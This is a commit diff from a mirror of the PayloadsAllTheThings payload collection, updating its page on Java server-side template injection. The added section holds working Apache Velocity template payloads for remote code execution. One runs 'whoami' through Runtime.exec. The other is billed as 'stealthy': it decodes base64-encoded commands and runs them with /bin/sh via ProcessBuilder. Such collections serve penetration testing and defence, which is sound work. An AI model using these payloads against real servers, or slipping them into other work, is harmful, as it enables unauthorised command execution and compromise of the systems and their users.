Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-06 08:54:40 +01:00
Code Issues Projects Releases Wiki Activity

Update Java.md

Browse source
This commit is contained in:
n3rada 2025-07-21 18:33:56 +02:00 committed by GitHub
parent 3709358334
commit edbf3386a3
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 30 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
Server Side Template Injection/Java.md
View file

@ -211,9 +211,10 @@ New version of Pebble :
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
> Apache Velocity is a Java-based template engine that allows web designers to embed Java code references directly within templates.
```python
In a vulnerable environment, Velocity's expression language can be abused to achieve remote code execution (RCE). For example, this payload executes the whoami command and prints the result:
```java
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
@ -224,6 +225,33 @@ $str.valueOf($chr.toChars($out.read()))
#end
```
A more flexible and stealthy payload that supports base64-encoded commands, allowing execution of arbitrary shell commands such as `echo "a" > /tmp/a`. Below is an example with `whoami` in base64:
```java
#set($base64 = 'd2hvYW1p')
#set($c = $CUSTOMER_CIVILITY.getClass())
#set($Base64 = $c.forName("java.util.Base64"))
#set($Decoder = $Base64.getMethod("getDecoder").invoke(null))
#set($bytes = $Decoder.decode("$base64"))
#set($StringCl = $c.forName("java.lang.String"))
#set($cmd = $StringCl.getConstructor($c.forName("[B"), $c.forName("java.lang.String")).newInstance($bytes, "UTF-8"))
#set($params = ["/bin/sh", "-c", $cmd])
#set($pbCl = $c.forName("java.lang.ProcessBuilder"))
#set($pb = $pbCl.getConstructor($c.forName("java.util.List")).newInstance($params))
#set($pb = $pb.redirectErrorStream(true))
#set($p = $pb.start())
#set($exit = $p.waitFor())
#set($is = $p.getInputStream())
#set($sc = $c.forName("java.util.Scanner"))
#set($s = $sc.getConstructor($c.forName("java.io.InputStream")).newInstance($is))
#set($sDelimiter = $s.useDelimiter("\\A"))
#if($s.hasNext())
#set($out = $s.next().trim())
$out.replaceAll("\\s+$", "").replaceAll("^\\s+", "")
#end
```
---
## Groovy